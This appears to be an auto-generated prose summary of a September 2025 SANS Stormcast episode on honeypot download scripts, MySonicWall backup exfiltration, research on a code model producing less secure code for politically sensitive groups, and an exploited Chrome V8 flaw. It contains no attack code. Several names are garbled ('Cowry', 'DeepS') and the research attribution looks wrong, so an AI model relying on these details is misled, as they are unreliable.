SANS Internet Storm Center Stormcast: September 19, 2025 Edition Highlights

In this September 19, 2025 edition of the SANS Internet Storm Center Stormcast, Johannes Ullrich from Jacksonville, Florida, presents several crucial topics in cybersecurity.

One of the highlights of this edition is an article written by Nathan Smith, an intern, who examines the download directory in the Cowry honeypot. This directory can be confusing for newcomers to honeypot investigation. Smith sheds light on a common method used by malicious bots: downloading a bash script that, in turn, downloads and executes bots for different architectures, hoping to find one compatible with the victim's system. This technique is frequent and it is important to recognize it to effectively sort through honeypot data.

Another topic covered is the recent SonicWall vulnerability. It has been revealed that 5% of My SonicWall accounts have been compromised by brute-force password attacks. This led to the exfiltration of backup files, an optional but preferred feature for some SonicWall models. Users should check their My SonicWall accounts to see if they are using this feature and follow SonicWall's recommendations, including resetting all passwords and checking affected serial numbers.

The podcast also mentions research from Cloudflare published in the Washington Post, which suggests that DeepS, a code model, writes less secure code for organizations related to sensitive causes in China, such as Falun Gong or Tibet. This discovery raises questions about the integrity and reliability of AI-generated code models, especially when used for politically sensitive causes.

Finally, a critical vulnerability in Google Chrome has been fixed. This vulnerability, a type confusion in Chrome's V8 JavaScript engine, has been actively exploited. Users are encouraged to restart Chrome to apply updates and ensure they are using the latest version to protect against this threat.

These insights are crucial for cybersecurity professionals and end-users, highlighting the importance of vigilance and regular updates to maintain system security.